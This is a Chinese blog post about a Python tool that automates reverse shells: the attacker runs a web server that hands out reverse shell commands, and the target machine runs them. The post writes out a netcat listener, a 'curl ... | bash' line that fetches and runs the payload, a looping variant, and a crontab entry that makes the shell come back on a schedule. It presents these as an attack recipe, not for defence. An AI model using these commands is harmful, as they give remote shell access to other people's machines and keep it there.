基于BS架构的自动化反弹shell

Web安全渗透测试
18年11月16日

laolisafe

这是一个node.js脚本改的python工具，攻击者搭建服务器先运行该程序，会启动一个web服务。然后只需在目标机器中对服务器发起请求，提交反弹shell的地址和端口，会自动返回构造好的shell命令然后逐个测试，直到命令成功执行。

运行方法：
VPS / Domain ：

python Get_Reverse_Shell.py
Attacker:
nc -lvp [reverse_port]
Target
curl http://domain/reverse_ip/reverse_port | bash
或者
while true; do curl http://domain/reverse_ip/reverse_port | bash; done
配合crontab使用效果更佳
crontab -e
/usr/bin/curl http://domain/reverse_ip/reverse_port | bash

下载

给TA买糖

共{{data.count}}人

人已赞赏

nc Web安全反弹shell 自动化

Web安全渗透测试

python识别图形验证码bug解决笔记

2018-11-16 10:31:03

Web安全

ubuntu学习之路

2018-11-26 10:30:14

0 条回复 A文章作者 M管理员

暂无讨论，说说你的看法吧

更换删除

❯

解锁会员权限

个人中心

今日签到

有新私信私信列表

搜索

幸运之星正在降临...

点击领取今天的签到奖励！

恭喜！您今天获得了{{mission.data.mission.credit}}积分

今日签到

连续签到

{{item.credit}}

连续{{item.count}}天

查看所有

我的优惠劵

_￥_优惠劵

使用时效：无法使用

使用时效：
之前

使用时效：永久有效

优惠劵ID：
×

限制以下商品使用：限制以下商品分类使用：不限制使用：

[{{ct.name}}]

所有商品和商品类型均可使用

没有优惠劵可用!

购物车

×

删除

购物车空空如也!

清空购物车前往结算

您有新的私信

没有新私信

写新私信查看全部